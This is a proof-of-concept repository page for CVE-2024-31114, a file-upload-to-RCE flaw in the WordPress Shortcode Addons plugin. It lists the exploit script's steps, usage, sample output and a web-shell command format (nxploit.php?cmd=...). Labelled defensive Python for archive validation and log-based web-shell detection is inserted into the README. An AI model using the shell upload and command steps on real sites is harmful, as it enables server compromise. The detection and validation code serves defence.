
CVE-2024-31114 PoC — WordPress Shortcode Addons <= 3.2.5 - Arbitrary File Upload vulnerability

Source
Associated Vulnerability
Title: WordPress Shortcode Addons <= 3.2.5 - Arbitrary File Upload vulnerability (CVE-2024-31114)
Description: Unrestricted Upload of File with Dangerous Type vulnerability in biplob018 Shortcode Addons. This issue affects Shortcode Addons: from n/a through 3.2.5.
Description
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
Readme
# CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

**Shortcode Addons <= 3.2.5 – Authenticated (Admin+) Arbitrary File Upload**  
**CVE ID:** CVE-2024-31114  
**CVSS Score:** 9.1 (Critical)  

---

## 🛠️ Vulnerability Description

The **Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension** plugin for WordPress is vulnerable to arbitrary file uploads due to **missing file type validation** in all versions **up to and including 3.2.5**.

This flaw allows **authenticated attackers with administrator-level access or higher** to upload arbitrary files to the server — which can lead to **Remote Code Execution (RCE).**
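The root cause named above is a missing file type check on the uploaded archive. The following Python is an added illustration of the check a defender would want in front of any "upload a zip and extract it into a web-served directory" feature; it is not the plugin's code (the plugin is PHP) and the extension lists, size cap and helper names are assumptions. It refuses archive entries that a web server could execute, entries that escape the target directory, entries whose final extension is not on an allow-list, and archives whose uncompressed size is implausible for an asset bundle.

```python
import io
import re
import zipfile
from typing import Dict, List, Optional

# Extensions the web server may hand to an interpreter. Constructed deny-list for
# this illustration; align it with the server's actual handler configuration.
EXECUTABLE_EXTENSIONS = {
    ".php", ".php3", ".php4", ".php5", ".php7", ".php8", ".phtml", ".phar",
    ".phps", ".htaccess", ".cgi", ".pl", ".sh",
}

# What a shortcode/asset bundle legitimately carries (assumed allow-list).
ALLOWED_EXTENSIONS = {".css", ".js", ".json", ".png", ".jpg", ".jpeg", ".gif",
                      ".svg", ".woff", ".woff2", ".txt"}

MAX_TOTAL_BYTES = 50 * 1024 * 1024     # assumed cap on uncompressed size
ABSOLUTE_RE = re.compile(r"^([A-Za-z]:|[/\\])")


def check_zip_entry(name: str) -> Optional[str]:
    """Return a rejection reason for one archive entry name, or None if acceptable."""
    parts = name.replace("\\", "/").split("/")
    if ABSOLUTE_RE.match(name):
        return f"absolute path: {name}"
    if ".." in parts:
        return f"path traversal: {name}"
    if name.endswith("/"):
        return None  # directory entry: nothing is written for it
    base = parts[-1].lower()
    # Examine every dotted suffix, so "shell.php.txt" and ".htaccess" are both caught.
    labels = base.split(".")
    for label in labels[1:]:
        if "." + label in EXECUTABLE_EXTENSIONS:
            return f"executable file type: {name}"
    # The final extension must be on the allow-list; files with none are refused too.
    final_ext = "." + labels[-1] if len(labels) > 1 else ""
    if final_ext not in ALLOWED_EXTENSIONS:
        return f"file type not on allow-list: {name}"
    return None


def validate_zip(data: bytes) -> List[str]:
    """Return every rejection reason for a zip blob; an empty list means safe to extract."""
    reasons: List[str] = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            total = 0
            for info in zf.infolist():
                total += info.file_size
                reason = check_zip_entry(info.filename)
                if reason:
                    reasons.append(reason)
            if total > MAX_TOTAL_BYTES:
                reasons.append(f"uncompressed size {total} exceeds cap")
    except zipfile.BadZipFile:
        reasons.append("not a valid zip archive")
    return reasons


def make_zip(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip from a name->content mapping (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    print(validate_zip(make_zip({"css/style.css": b"a{}"})))        # []
    print(validate_zip(make_zip({"nxploit.php": b"<?php echo 1;"})))  # rejected
```

The check runs on entry names before anything is written to disk, which is the only point at which it is cheap to refuse; validating the outer file's extension alone (".zip") is exactly the gap the vulnerability describes, since the archive contents are what end up under the web root. Pairing this with a web-server rule that never executes scripts beneath the uploads directory removes the impact even when a check like this is bypassed.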

---

## 🚀 Script Description

This Python script automates exploitation of the vulnerability. It performs:

1. Disabling SSL verification
2. Logging in with given credentials
3. Extracting the CSRF token (`_wpnonce`)
4. Generating a PHP shell (`nxploit.php`)
5. Compressing and uploading it as a `.zip`
6. Confirming the upload and accessing the shell
7. Executing `whoami` on the target server

---

## 🧪 Usage

```bash
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password
```

---

## 📤 Example Output

```
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
```

---

## 🐚 Web Shell Usage

Once the payload is uploaded, you can execute system commands using the following format:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
```

🔹 Example:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
```

This will list the contents of the current directory on the server.
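From the defender's side, the request shape shown above (a `.php` file served from `wp-content/uploads/` with a `cmd=` parameter) is a strong signal in web-server access logs, because the uploads directory is a media store that should never execute scripts. The following Python is an added detection example, not part of the original repository; the combined-format regex, the parameter-name list and the sample log lines are constructed for this illustration.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOADS_PREFIX = "/wp-content/uploads/"   # media directory: should never serve PHP
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# "cmd" is the parameter name shown in the README; the others are assumed variants.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a request that executes a script under uploads, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m["target"])
    if not url.path.startswith(UPLOADS_PREFIX) or not SCRIPT_EXT_RE.search(url.path):
        return None
    params = parse_qs(url.query)
    hit = sorted(SHELL_PARAMS & set(params))
    return {
        "ip": m["ip"],
        "time": m["time"],
        "path": url.path,
        "status": m["status"],
        # Any script under uploads is suspicious; a command parameter marks a likely web shell.
        "severity": "high" if hit else "medium",
        "command": params[hit[0]][0] if hit else "",
    }


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over a batch of log lines and keep only the findings."""
    return [f for f in (classify(line) for line in lines) if f is not None]


# Constructed sample log: one benign image fetch, two requests to a script in
# uploads (one carrying a command), and an unrelated login POST.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2025:12:00:01 +0000] "GET /wp-content/uploads/2025/03/logo.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2025:12:00:02 +0000] "GET /wp-content/uploads/shortcode-addons/nxploit.php?cmd=whoami HTTP/1.1" 200 18 "-" "python-requests/2.31"',
    '203.0.113.5 - - [10/Mar/2025:12:00:03 +0000] "GET /wp-content/uploads/shortcode-addons/nxploit.php HTTP/1.1" 200 0 "-" "python-requests/2.31"',
    '198.51.100.7 - - [10/Mar/2025:12:00:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The medium-severity match (a script under uploads with no command parameter) is worth keeping: it catches the first access that confirms the upload, and it catches shells that take their input through POST bodies or headers that the access log does not record. A 200 status for such a path also tells you the server is executing PHP from the uploads tree, which is the configuration weakness to fix alongside patching the plugin.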


## ⚠️ Disclaimer

This tool is for **educational and authorized testing purposes only**.  
The author is **not responsible** for any misuse or damage caused by this script.

Use responsibly and only on systems you have explicit permission to test.

---
**By:** Nxploited | Khaled Alenazi  


File Snapshot

```
[4.0K] /data/pocs/1c7573d2eaa001a3272ea1e5512608a44094aa45
├── [4.3K] CVE-2024-31114.py
├── [1.1K] LICENSE
└── [2.5K] README.md

0 directories, 3 files
```